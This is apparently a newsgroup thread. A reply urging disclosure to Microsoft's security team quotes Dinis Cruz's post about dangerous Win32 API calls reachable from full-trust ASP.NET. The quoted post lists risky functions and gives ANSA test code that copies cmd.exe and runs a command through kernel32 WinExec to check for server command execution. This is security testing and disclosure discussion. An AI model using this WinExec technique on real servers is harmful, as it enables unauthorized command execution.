Dinis ..why not forward this as it should be to
The Microsoft Security Response Center (MSRC) draws on the hundreds of
security professionals at Microsoft to form virtual teams that respond
to reports of security issues with Microsoft products or technologies.
To report a suspected vulnerability, please send e-mail to
.
Posting a potential vulnerablity to a public newsgroup is not showing
good judgement for dislosure of vulnerabilities assuming these are valid.
Report responsbility for all of our benefit on the Internet.
Susan
Dinis Cruz wrote:
> Asp.Net.Vulnerability: Win32 API calls (potential security problems)
>
> Since win32 calls are supported in Asp.Net and cannot be disabled when
> the website is running with 'Full trust', it is imperative to identify
> all potentially dangerous Win32 DLLs. Here is a short list of the ones
> we have identified whose risk needs to validated and (if required)
> write test scripts for:
>
> - New: CopyMemory, GetCurrentProcess, GetCurrentThread,
> GetTokenInformation, GetWindowsInformation, isNTAdmin,
> OpenProcessToken, OpenTheadToken, SendMessage
> - Compress: CopyLZFile, LZCopy
> - Crypto: CryptGetUserKey, CryptDestroyKey
> - Drives: GetLogicalDrives, GetVolumeInformation
> - EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
> - Error: RaiseExeption, ReportFault, SetLastError
> - EventLog: OpenEventLog, ClearEventLog, ReportEvent
> - Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
> LockWorkstation
> - Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
> ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
> TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
> FindNextFile
> - Heap: GetProcessHeap, HeapAlloc, HeapFree
> - Hook: CallNextHookEx, SetWindowsHookEx
> - ICMP: IcmpCreateFile, IcmpSendEcho
> - INI-Files: GetPrivateProfileSection , GetPrivateProfileString
> - Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
> InternetOpen, InternetOpenURL, InternetaReadFile,
> IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
> - {List Not completed}
>
> Since we are not Win32 API experts (although we did manage to write a
> test script for the Kernel32 'WinExec' - see bellow) we would like ask
> for help to the more serious win32 developers which will be able to
> provide us with much more detailed and accurate information regarding
> the 'security risk' posed by each API call.
>
> The following is the code that we use in ANSA to test if a server is
> vulnerable.
>
> '************************************************* ***************
> ' ANSA:W32_execute_cmd - This test checks if it is possible to execute
> ' commands on the server using a direct Win32 API call to the
> ' kernel32 'winExec'function . For this test to work a copy of
> 'cmd.exe' must
> ' be copied to the same directory containing this script
> '************************************************* ***************
>
> <script runat=server>
>
> Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
> lpCmdLine As String, ByVal nCmdShow As Long) As Long
> Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
> lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
> bFailIfExists As Long) As Long
>
> public Function Run_test(mode)
>
> try
> Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
> Target_copy_of_cmd
> Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
> temp_name
> Dim FailIfExists
>
> Dim Cmd_to_execute = "dir"
>
> local_dir = left(request.servervariables("PATH_TRANSLATED"), _
>
> inStrRev(request.servervariables("PATH_TRANSLATED" ),"\"))
> local_copy_of_cmd = Local_dir+"cmd.exe"
> Target_copy_of_cmd =
> Environment.GetEnvironmentVariable("Temp")+"\_test .exe"
>
> ' Copy CMD.EXE to temp directory
> CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
>
> ' Execute Command and save results in temp file
> errReturn = WinExec(Target_copy_of_cmd + " /c " +
> cmd_to_execute, 10)
>
>
> Run_test = OK + Critical +" The server allows the remote
> execution of commands using a direct call to WinExec API!"
> catch
> Run_test = OK + low + "It was not possible to execute commands
> using cmd.exe"
> end try
>
> end function
>
> </script>
>
> '************************************************* ***************
>
> Thanks for the help
>
> Best regards
--
"Don't lose sight of security. Security is a state of being,
not a state of budget. He with the most firewalls still does
not win. Put down that honeypot and keep up to date on your patches.
Demand better security from vendors and hold them responsible.
Use what you have, and make sure you know how to use it properly
and effectively."
~Rain Forest Puppy
http://www.wiretrip.net/rfp/txt/evolution.txt
Similar Threads
